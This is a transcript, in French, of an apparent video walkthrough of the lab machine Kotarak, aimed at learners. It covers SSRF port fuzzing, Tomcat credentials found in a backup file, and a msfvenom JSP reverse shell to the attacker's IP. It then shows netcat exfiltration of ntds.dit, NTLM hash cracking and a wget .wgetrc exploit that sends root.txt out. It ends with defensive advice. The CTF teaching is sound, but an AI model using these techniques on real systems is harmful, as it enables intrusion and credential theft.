Bonjour à toutes et à tous, apprentis hackeuses et apprentis hackers. Alors aujourd'hui j'ai sélectionné la machine Kotarak, qui est une machine difficile. Alors pour que la vidéo soit pas trop longue, je vais passer vite sur certains éléments, même sur certains éléments qu'on n'a pas déjà vus, mais je vais focaliser comme à chaque vidéo sur 5 sujets. Et du coup j'ai choisi celle-là parce que elle est intéressante pour les SSRF, qui sont des types de vulnérabilités que je rencontre de plus en plus souvent durant mes audits. Alors je trouvais intéressant qu'on parle de SSRF sur Acksize. Comme d'habitude, j'ai déjà fait le scan and map pour gagner du temps, et on voit ici le résultat. Donc 4 ports ouverts, 2 HTTP, dont un avec Tomcat, du SSH classique, et un Apache JServe, donc des servlets probablement fournis par Tomcat. Le bon chemin, c'est de commencer par le dernier port, le port 60 000. Donc il y a du HTTP d'ouvert avec quelque chose qui semble s'appeler du Kotarak Web Hosting. Alors voyons voir à quoi ça ressemble. 155 pardon, 2.60 000. Pourtant c'est bien du HTTP et pas du HTTPS. Le VPN est bien up. Ah ouais, ça met un peu de temps. Et donc on voit qu'on a un web browser to surf the web anonymously. Please do not abuse it. Donc là c'est un clin d'œil de l'auteur de la machine pour dire abuser de ce service. Et comme on voit que c'est une espèce de proxy en fait qui est fourni, on pense tout de suite à la SSRF, puisque la SSRF c'est un type d'exploit où l'attaquante profite de la fonctionnalité d'un serveur pour accéder à une information à laquelle elle n'est pas censée avoir accès normalement. Donc une information à laquelle elle n'a pas accès en direct, et grâce à ce browser qui permet de faire du proxy, on va voir si on peut pas accéder à des informations auxquelles n'a pas pensé la personne qui a installé ce proxy. Du coup, on va prendre, voyons voir. Et on voit que ça renvoie pas grand chose. Alors est-ce que ce serait parce que le DNS est pas super bien configuré sur la machine? On va essayer de taper l'IP en direct, voir si ça change quelque chose. C'est plus lent. Alors du coup pendant qu'on voit si ça marche bien ce proxy, donc l'idée ça va être de profiter de ce proxy pour aller taper des pages qui n'ont pas été prévues à la base. Et donc la première endroit où on a envie de taper, c'est en localhost, puisque potentiellement on peut utiliser ce service pour aller se connecter à des services en localhost auxquels on n'a pas accès depuis nous. Depuis l'extérieur. Donc potentiellement nous on voit 4 ports ouverts, mais peut-être qu'il y a d'autres ports ouverts mais accessibles uniquement sur le localhost. Et c'est pour ça que on peut tester ça en faisant du fuzzing sur l'URL. Alors du coup, pendant que ça mouline, je vais en ouvrir un deuxième. Donc si par exemple je fais 127.0.0.1 submit, on voit que ça renvoie rien et que l'URL est ici. Et du coup, si je change 127.0.0.1 en rajoutant 22 par exemple, puisque je sais que le port 22 est ouvert, on voit que ça répond protocole mismatch, puisqu'on tape en HTTP un service qui est en SSH,
Mais du coup, c'est bon, ça veut dire que la vulnérabilité est bien présente, puisque je peux taper des services locaux à la machine via ce proxy. Du coup, l'idée, ça va être de reprendre cette URL et de faiser le dernier avec tous les ports de 1 à 65 535. Donc c'est parti, pour ça on va faire wfuzz -c -z range. Donc -c, je sais même plus pourquoi c'est d'ailleurs. On va regarder ça vite fait. Man wfuzz. Je crois que c'est une histoire d'affichage. Ah oui, C c'est colors pour afficher les couleurs. Et Z. ZZZ. Je crois que c'est pour pouvoir utiliser la fonction range. Du coup, on va mettre 1 à 65 535. Donc je vais cacher tous les résultats où il y a 2 lignes en réponse. Pourquoi je fais ça? Parce que si on fait... par exemple ici, bon, je pense que vous voyez pas bien, mais là, il y a 2 lignes, enfin 2 retours à la ligne. Et donc ça c'est la réponse par défaut. Donc je cache la réponse par défaut pour voir ceux qui vont répondre avec plus de lignes. Par exemple le port 22 est plus intéressant puisque ça répond avec 5 lignes. Donc on a besoin de l'afficher en sortie de fuzzing. Donc on veut tout ce qui va répondre avec un nombre de lignes différent de 2 sur l'URL ici présente, url.php, pass égale 127.0.0.1 2.fuzz. Et du coup je comprends pas bien pourquoi le service marche pas sur une URL normale. Je sais pas si c'est parce que la machine n'a pas accès à internet. Mais bon, c'est pas grave puisque nous on va la hacker pour taper pas internet mais le localhost. Et donc on voit qu'il y a pas mal de ports qui répondent autre chose que par de lignes. Donc pour 22 ça on savait déjà. 90, 110, 200, 320, 888. Je le laisse tourner un peu. Et du coup, pour aller au plus vite le bon chemin, le truc intéressant c'est le 888, et on voit d'ailleurs que la réponse c'est celle qui est la plus grande, donc c'est effectivement celle qu'on a envie de voir en premier. Donc voyons voir, qu'est-ce qu'il y a de particulier sur ce port 888. Et on voit que ça répond par... en gros, il y a un serveur web qui est avec du directory listing activé. Et donc on peut lister ce qui est présent sur ce serveur web sur le port 888. Et je rappelle que le port 888... je vais arrêter le fuzzing parce que ça part en vrille sur l'affichage. Le port 888 n'est pas accessible depuis internet, donc on n'est pas censé avoir accès à ce port depuis internet. Mais grâce à ce proxy, on va pouvoir taper ce port. Et donc on peut les taper un par un, mais on va les taper directement le premier qui est celui qui est intéressant. Et donc comme on le voit dans l'URL en bas à gauche, si on fait doc égale backup, ça affiche le contenu de ce doc backup. Et donc je le rajoute à la fin, doc égale backup. Et là on voit rien, mais si je fais afficher le code source, on voit qu'en effet, quand on clique sur doc backup, on a accès à ce fichier XML qui contient admin et mot de passe du Tomcat. Donc parfait, on va pouvoir se connecter au Tomcat. Alors le Tomcat, je rappelle que c'est un serveur web libre pour des applications Java. Je crois qu'on en a déjà poney sur Acksize. Du coup, donc c'est sur le port 8080 comme on voit sur le résultat du scan and map. Et on va pouvoir exploiter ça avec MSF Venom. Alors première chose, on valide que le mot de passe est bon. Donc pour valider que le mot de passe est bon, très simple, on fait 10.10.55, donc on a dit port 8080, et l'URL par défaut sur Tomcat c'est manager/html. Donc là je tape admin, mais comme un con j'ai oublié de retenir le mot de passe qui est chiant à taper, donc je vais le faire un copier-coller. Try again, admin, coller.
ça passe. Donc le mot de passe qu'on a trouvé dans un fichier à plat est bien le bon mot de passe pour se connecter à l'interface Tomcat. Et donc, comme on a dû le faire dans une précédente vidéo, si je ne m'abuse, on peut utiliser MSF Venom pour générer un reverse shell grâce à l'accès à Tomcat. Donc pour ça c'est assez simple. MSF Venom -p, donc c'est du Java, hein. JSP shell reverse TCP, donc je demande au Java de faire un reverse shell TCP sur ma machine qui a pour IP 10.10.14.28. On va le faire sur le port 1, 2, 3, 4. Donc le format c'est du war pour Apache Tomcat. Et on va l'appeler lisbeth.war. Donc on attend quelques secondes le temps que MSF Venom nous génère ce fichier. Et une fois que le fichier sera créé, on pourra l'uploader sur la partie ici war file to deploy. Voilà, donc browse, je vais uploader ce fichier war que l'on vient de générer avec MSF Venom. J'aurai besoin évidemment, une fois qu'on l'aura disponible, de mettre un NC en écoute sur le port 1, 2, 3, 4 qu'on a défini ici, pour que quand on va exécuter le war sur la cible, et ben qu'il puisse se connecter sur notre machine attaquante. Donc là on voit qu'on l'a uploadé, on a une nouvelle application qui s'appelle /lisbeth, et quand je clique dessus, bim, la cible se connecte à ma machine en tant que Tomcat. Alors est-ce qu'on a Python? Oui, donc je fais la commande habituelle pour avoir un shell un peu mieux. Spawn. Ah, attention de ne pas se tromper avec les doubles quotes et les simple quotes. Voilà, donc on est sur une machine qui s'appelle Kotarak DMZ en tant que Tomcat. Et si on va sur /home, on voit qu'il y a Tomcat et Atanas. Et si je vais sur Atanas, on voit qu'il y a le flag. Mais si je fais cat user et C4, on voit que je n'ai pas accès à ce flag puisque il faut être Atanas et nous on est Tomcat. Ok, donc on va devoir faire du mouvement latéral. Donc pour aller au plus vite, je vais prendre la bonne solution. La bonne solution, ça consiste à faire un peu d'exploration sur le répertoire où on a accès, c'est-à-dire sur notre Tomcat. On voit qu'il y a un seul dossier. Si on va dedans, le tout archive, on voit qu'il y a des données de pentest. Et si on va dedans, on voit qu'il y a deux fichiers qui semblent être des un ntds.dit et les clés système qui correspondent probablement vu le nom des fichiers qui semblent avoir été récupérés via psexec. Du coup on va rapatrier ça sur la machine attaquante. Le plus simple, hein, ça va être, enfin le plus simple, moi je l'avais fait avec ANC, il y a sûrement il y a d'autres possibilités, c'est même sûr, mais je la trouve relativement simple et suffisante pour notre besoin à cet instant T. Donc je vais mettre un truc en écoute sur ma machine qui va écrire le fichier ntds.dit et en face je vais envoyer le fichier avec un... Donc déjà on vérifie qu'il y a bien NC, c'est bon, donc NC-NV, l'adresse IP de ma machine que j'ai déjà oublié, 1428. Sur le port 1, 2, 3, 4, 5 qu'on a ouvert ici, et donc je balance dans ce c'est pas un tunnel mais bon dans cette socket le fichier .dit. Donc la cible se connecte à ma machine, transfère le fichier, et une fois que c'est fini, on peut vérifier que si je fais md5 zoom côté serveur et md5 zoom sur ma machine attaquante,
de ce fichier ntds.dit que je viens de récupérer. On a bien le même hash, donc c'est bon, il n'y a pas de perte de paquet. Même opération sur le deuxième fichier .bin, que je vais appeler ntds.bin. Pardon, si je fais pas entrer, ça risque pas de marcher. Je mets ça en grand parce qu'il est un peu chiant à trouver, il est là. nc-nv 10 14 28 1 2 3 4 5 et voilà, on a les deux fichiers bin et dit sur notre machine attaquante. Maintenant qu'on a fait ça, c'est la partie où que je vais passer vite, même si on en a jamais parlé, enfin pas parlé de cette technique là sur Acksize. Mais bon, je peux pas aborder en détail tous les sujets. Ça va consister à extraire donc de ces deux fichiers, enfin plus précisément de .dit, mais à l'aide du fichier .bin, les hashes présents dans cette base de données. Et pour cela, on va utiliser un tool qui s'appelle ESEDB Export. Donc il y a un truc expérimental pour faire de l'export de base de données de ce format-là. Donc la commande va consister à faire ESEDB Export -m tables pour extraire les tables, et je mets mon ntds.dit. Une fois qu'on aura extrait ces tables, voilà, c'est relativement rapide, donc il m'a créé un répertoire ntds.dit.export. Et dans ce répertoire, il m'a mis un certain nombre de fichiers. Ceux qui vont nous intéresser, c'est data table et link table, dont on va pouvoir extraire donc les hashes avec le deuxième tools que dont j'ai fait un git clone précédemment, qui s'appelle ntds extract. Et donc ntds extract, ça s'utilise avec cette commande, donc des users. Donc il y a un paquet de paramètres à mettre. D'abord on va mettre la data table. Donc la data table on l'a dans ntds.dit.export/datatable. Ça c'est la première chose dont il a besoin. La deuxième chose dont il a besoin c'est la link table. Donc rebelote mais ce coup-ci avec la link table. Ensuite il a besoin d'un répertoire où il va écrire la sortie. Donc je vais faire un mkdir, on va l'appeler extracted hashes. Extracted hashes. Ensuite, qu'est-ce qu'on a besoin d'autre, de spécifier le lmout file, on va appeler lm.out, vu que j'ai pas d'imagination. ntout file nt.out. Password hashes, on va le mettre en format John, et on va utiliser donc la syshive qui est donc le fameux fichier .bin dont on a besoin pour réaliser cette opération. Et je pense qu'on est pas mal. Alors qu'est-ce qu'il me dit? Missing password hash output file. Il semblerait que j'ai oublié quelque chose. Bah mince alors, à chaud je vois pas ce qui manque. ntout file. Voilà, c'est mieux. Donc on le laisse travailler. Bon là cette partie elle est pas super réaliste, enfin j'ai pas bien compris. Mais en gros donc on va réussir à extraire des hashes et l'utilisateur Atanas qui contient donc le flag user.txt a comme mot de passe un des hashes justement
Alors j'imagine que l'idée c'est qu'il a fait du PSExec sur une machine qu'il possédait pour, je sais pas, pour tester le PSExec ou j'en sais rien. Et que du coup cette machine avait le même mot de passe que son mot de passe sur la machine cible. Ok, alors je vais aller pour aller plus vite. Donc déjà bon, j'ai oublié de montrer, mais on a récupéré les haches, hein, comme on le voit ici. On en a plusieurs, hein, là-haut. Donc je prends le premier. Hop, je pense que je vais faire les trois d'un coup. On va aller sur Crackstation pour pas s'embêter. Hop, et on va coller tous ces haches. NTLM V1. Est-ce qu'il y en a un troisième? Administrator. Parfait, donc il y en a deux qu'il arrive à casser. Password 1, 2, 3 qui sera pas le bon, mais et F7 Tomcat qui lui sera le bon. Et donc je reviens sur mon shell sur la cible. Je fais un SU sur Atanas, hein, qui est donc l'utilisateur qui nous intéresse. Et je colle le mot de passe F16 Tomcat. Et bim, en effet, on peut devenir Atanas. Et donc je peux aller dans Home Atanas et faire le cat user qu'on pouvait pas faire tout à l'heure. Voilà pour le flag user. Donc c'était la partie la plus longue. Au début je me suis dit je vais m'arrêter là, mais en fait c'est quand même dommage parce que la dernière partie est relativement rapide et intéressante pour devenir root. Donc je me suis dit tant pis, faisons en entier une vidéo de cette machine dure, même si l'objectif était quand même principalement de parler de SSRF. Alors ici, quand on est Atanas, on a directement accès au répertoire root et on a dedans un flag qui s'appelle donc pas root. Alors que le flag qu'on recherche c'est le root.txt et on voit qu'il y a une prolongation, que c'est pas si simple. Le deuxième fichier qui est présent dans ce répertoire root, app.log, nous permet d'avoir une bonne piste, c'est des logs de connexion, et on voit que le client est wget 1.16. Or, si on regarde sur Searchploit par exemple, sur wget, on voit que le wget inférieur à 1.18 a on voit pas bien donc je grossis le truc. On voit qu'il y a une RCE possible sur cette version de wget. Donc ça c'est intéressant parce que c'est vrai qu'on le fait rarement, mais on peut aussi pwnner des clients, on pwnne pas toujours des serveurs. Donc là globalement il y a un client qui se connecte et qui utilise une vieille version de wget, donc on va utiliser cette connexion pour afficher le mot de passe root, enfin le mot de passe, le flag root.txt qui est présent sur la machine se connectant. Donc je fais d'abord un ifconfig, peut-être je sais pas si c'est le plus parlant pour vous montrer que en effet le 10.03 qu'on voit apparaître dans les logs et donc passe sur la même interface que l'interface que nous on a utilisée, l'interface Ethernet pour pwnner la machine. Donc la cible vient d'un autre réseau. Parfait, parfait. Alors, du coup, pour exploiter ça, c'est pas si simple, mais c'est pas non plus super compliqué grâce à ExploitDB une fois de plus, qui contient l'exploit en question. Oups, Deluxe, attache. Et donc l'exploit en question, c'est le 40064. Donc on va l'afficher là-dessus, exploit DB. Et nous c'est 40064. Pardon, 40064. Voilà, donc je vous laisserai tranquillement lire tout ça. Nous, ce qui va nous intéresser, c'est d'abord donc de configurer un point wgetrc. Et ce point wgetrc, on va le mettre sur notre machine attaquante et il va être récupéré pendant l'attaque par la cible. Donc je vais le mettre ici à la racine, je vais pas m'embêter même s'il y a un paquet de fichiers. Donc on va l'appeler point .wgetrc, on n'a pas trop le choix sur le nom, et je vais utiliser un end of file, donc
quand on va taper Lisbeth comme ça va arrêter l'écriture au sein du fichier. wget-rc. Donc ici il faut mettre postfile qui est le fichier qui nous intéresse. Donc dans l'exploit ils mettent etc shadow, mais nous ce qui nous intéresse c'est root.root.txt. Output document qui là par contre on peut laisser le même qui est fourni dans l'exploit, qu'ils ont appelé wget root shell. Et donc je mets Lisbeth pour dire que j'ai fini d'écrire dans mon point wget-rc. Ensuite, qu'est-ce qu'on a besoin de faire? On a besoin, ah oui, donc on va utiliser une librairie FTP, puisqu'en fait l'exploit utilise du FTP. Et du coup, le plus simple pour jouer avec du FTP, c'est, enfin, je sais pas si c'est le plus simple. Moi, je trouve que c'est une des solutions les plus simples. C'est une librairie qui s'appelle pyftpd lib, tout simplement. Et donc, elle est très pratique puisque on peut, avec une simple commande, monter un serveur FTP. Donc la commande, ça va être, d'ailleurs, pour être plus propre, je vais quand même faire un répertoire FTP. Et un move du point wget-rc dans ce répertoire FTP, histoire de quand même être un minimum propre. Et donc j'ai juste à faire python 3-m pyftpd lib sur le port 21 en FTP, -w, je ne sais plus à quoi ça correspond. Évidemment, comme on écoute sur le port en dessous de 1024, on a besoin d'être sudo. Voilà, donc ça j'ai sur ma machine attaquante, j'ai bien un serveur FTP en écoute qui va pouvoir donner le fichier .wget-rc quand on va exploiter la cible. Donc première étape. Alors wget, j'ai pas précisé, mais c'est un client, donc HTTP, HTTPS, FTP. Je pense qu'on l'a déjà utilisé. Et c'est pas tout neuf, il a été développé en janvier 1996. Donc c'est vraiment, il a un long historique, et donc c'est normal qu'il ait eu quand même, durant sa longue vie, des exploits sur lui. Alors on n'est pas loin d'arriver à la fin, maintenant il ne reste plus qu'à récupérer ce script. Si j'y arrive, tac. Et à modifier un peu 2-3 trucs pour que ce soit fonctionnel. Donc je vais faire avec mousepad, on va l'appeler Lisbeth exploit.py. Je colle. Alors voyons voir, tac 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 tac. Je pense que tout ça, il n'y a rien à changer. Voilà, ce qui nous intéresse, c'est plutôt l'IP en écoute. Je la vire, comme ça il va écouter, ou je mets 0.0.0 pour que ce soit plus propre. Sur toutes les IP. FTP host, c'est notre IP, donc notre IP, c'était la 14.28 ou 18, je sais plus. 28. Tac. Et ma foi, je crois que tout le reste, on n'a rien à changer. Ça me paraît pas mal. Donc il faut par contre évidemment l'envoyer sur la cible pour pouvoir l'exécuter et exploiter la cible. Donc ce que je vais faire, c'est un répertoire www, je le déplace dedans. Et je vais faire donc python 3-m http.server. Ici, comme ça sur la cible, je fais un wget http ://1010.14.28 sur le port 8000 et je récupère ce superbe Lisbeth exploit.py 404 Lisbeth-exploit Lisbeth-exploit what ls1 ls1l ah mince, j'ai pas ouvert sur le bon, bon répertoire mon serveur. cddd, on la refait.
c'est mieux quand même. Donc maintenant que j'ai récupéré, je vais faire un ls-l. Il est bien là. Je mode plus X, ça va pas être utile puisqu'on va utiliser Python. Je pense qu'on a à peu près tout en place pour que ça se passe. Ah non, il y a un dernier détail, on peut le voir si je le lance. Python Lisbeth exploit. Il me dit permission denied puisque il va écouter sur un port en dessous de 1024, donc évidemment il n'a pas les droits. Et là je peux pas faire sudo puisque j'ai pas les sur la machine cible, j'ai pas les droits. Donc on va utiliser une astuce, c'est hotbind. Et hotbind ça permet d'écouter sur un port en dessous de 1024 sans être root. Je vous laisserai regarder sur Wikipédia, il montre un peu en détail comment ça fonctionne. En gros ça va utiliser le preload. Et du coup, comme il est présent sur la machine cible, on n'a pas besoin, on peut l'utiliser pour directement pour lancer notre commande. Donc c'est simplement, ça consiste simplement à rajouter out, je sais pas comment on prononce, bind devant le Python qu'on faisait. D'ailleurs, est-ce que c'est du Python 2 ou du Python 3 ? On va laisser par défaut, on verra bien s'il râle, c'est qu'il fallait mettre l'autre. Alors, Lisbeth exploit.py. Du coup, il va falloir patienter un peu puisque les connexions provenant de wget, je crois qu'il y en a une toutes les 2 minutes, quelque chose comme ça. Et j'espère que on a bien mis tout ce qu'il faut en place. Je vais vérifier que dans FTP, laisse-moi FTP, j'ai bien le wget-rc. Donc l'exploit a bien réussi à se connecter sur notre serveur FTP, jusqu'ici tout va bien. Il est en attente donc sur le port 80, il attend que wget se connecte. Et du coup je vais mettre une pause peut-être parce que ça peut être, en fonction de quand on tombe dans le timer, ça peut être un peu long. On a une requête du client, on a pu donc uploader le point getRC à travers la redirection FTP. On voit ici que notre serveur FTP a bien reçu la requête pour récupérer le point wget-rc. Du coup, maintenant tout est en place pour la récupération du fichier root.txt. Là pareil, il va falloir attendre un peu. Donc je refais une pause. On reçoit le contenu du fichier. Donc là, c'est le script affiche etc shadow, mais nous, comme on a modifié, c'est par root.txt, on a ici le flag que j'ai caché avec la fenêtre pour éviter de faire du montage vidéo après. Le flag root.txt de cette machine. Et donc on a fini de poney ce Kotarak, cette machine Kotarak. Du coup, donc côté Blue Team, ce qu'on peut retenir là, c'est pour les SSRF, pour s'en protéger, il faut bien durcir. Si elles sont volontaires, évidemment, si elles sont pas volontaires, on les bloque. Mais là, c'était volontaire puisque le service avait besoin enfin, c'est un service proxy quoi. Donc si c'est volontaire, il faut bien penser à durcir le localhost, enfin tous les services qui sont en écoute sur la machine qui héberge ce service. Et pas que, aussi bien durcir tout le reste, en gros tous les services potentiellement accessibles par le programme en question, puisque s'il y a un service non accessible depuis internet mais accessible depuis ce service proxy, et l'attaquant va en profiter pour aller le taper. Donc du coup sur le SSRF, j'ai pas parlé de la hackeuse de la semaine qui se nomme Cristina Camilleri et Camilleri, pardon.
je sais pas comment on prononce, et qui bosse à Netflix, et propose donc un lien super intéressant, enfin elle retweet un lien super intéressant si vous voulez creuser le sujet des SSRF, je le mettrai sous la vidéo, pour vous montrer à quel point c'est une faille qu'il ne faut pas sous-estimer. Voilà pour les SSRF. Après, qu'est-ce qu'on a eu d'autre? On avait donc le mot de passe en clair pardon, du tome 4 qui traînait, donc ça va faire attention à ne pas laisser si possible des mots de passe en clair, ou en tout cas à restreindre l'accès des fichiers qui contiennent des mots de passe en clair. Et donc la troisième grosse faille de cette machine, c'est la version W4 qui est ancienne, donc pensez à mettre à jour pas que les serveurs, mais aussi les clients, puisqu'on peut exploiter les clients également. N'hésitez pas à laisser des commentaires, surtout si j'ai pas été clair, ou à compléter ce que j'ai dit, on va dire si à corriger mes bêtises, etc. Et donc, je ne me reste plus qu'à vous dire à la semaine prochaine pour faire un pas de plus vers le niveau hacking de Lisbeth Salander.